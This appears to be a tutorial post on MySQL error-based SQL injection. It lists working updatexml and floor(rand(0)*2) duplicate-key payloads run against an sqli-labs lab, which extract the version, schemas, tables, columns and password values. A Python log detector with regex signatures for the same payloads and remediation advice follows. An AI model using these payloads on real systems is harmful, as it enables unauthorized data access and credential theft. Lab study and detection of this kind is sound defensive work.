Error-based injection statements

I. The SQL error-based injection process

Error-based injection

http://192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php

?id=2' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) -- - (database version)

http://192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php

?id=2' and updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- - (emails)

http://192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php

?id=2' and updatexml(1,concat(0x7e,(select (column_name) from information_schema.columns where table_name="users" limit 0,1),0x7e),1)-- - (users)

II. Error-based injection of tables, columns, and field values

1. Dumping all tables

http://test

?id=1' and (select 1 from (select count(*),concat(((select (schema_name) from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -

http://test

?id=2'and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -

2. Current database

http://test

?id=2' and (select 1 from (select count(*),concat(((select concat(database(),';'))),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -

3. Tables in the current database

http://test

?id=2' and (select 1 from (select count(*),concat(((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -

4. Column names

http://test

?id=2' and (select 1 from (select count(*),concat(((select concat(column_name,';') from information_schema.columns where table_name='users' limit 5,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -

5. Field values

http://test

?id=2' and (select 1 from (select count(*),concat(((select concat(password,';') from users limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -
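
Seen from the defending side, the two payload families above (updatexml XPath errors and the count(*) / floor(rand(0)*2) / group by duplicate-key error) leave recognizable shapes in request logs. The following is an added example, not part of the original post: a small detector run over constructed request URLs. The host lab.example, the rule names, and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures derived from the payload shapes listed on this page.
RULES = {
    "xpath_error_updatexml": re.compile(r"\bupdatexml\s*\("),
    "duplicate_key_floor_rand": re.compile(
        r"count\s*\(\s*\*\s*\).*floor\s*\(\s*rand\s*\(.*\)\s*\*\s*2\s*\).*group\s+by"),
    "information_schema_read": re.compile(r"\binformation_schema\s*\.\s*\w+"),
}

def normalize(value):
    """Lowercase, replace inline /* */ comments with a space, collapse whitespace."""
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", value)

def inspect_request(url):
    """Return {parameter: [rule names]} for every query parameter that matches."""
    hits = {}
    # parse_qsl percent-decodes each value before it is matched
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        matched = sorted(rule for rule, rx in RULES.items() if rx.search(normalize(raw)))
        if matched:
            hits[name] = matched
    return hits

# Constructed request lines (hypothetical host lab.example), not real traffic.
SAMPLES = [
    "http://lab.example/Less-5/index.php?id=2",
    "http://lab.example/Less-5/index.php?id=2%27%20and%20UpdateXML(1,concat(0x7e,"
    "(select%20@@version),0x7e),1)%20--%20-",
    "http://lab.example/Less-5/index.php?id=2%27and%20(select%201%20from%20(select%20"
    "count(*),concat((select%20database()),floor%20(rand(0)*2))x%20from%20"
    "information_schema.tables%20group%20by%20x)a)%20--%20-",
]

def scan(urls):
    """Return only the requests that triggered at least one rule."""
    return [(u, h) for u in urls if (h := inspect_request(u))]

if __name__ == "__main__":
    for url, hits in scan(SAMPLES):
        print(hits, url[:60])
```

Pattern matching of this kind is a detection aid only; the fix is to bind id as a query parameter and to stop returning database error text in the HTTP response, since these payloads depend on that error text being displayed.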
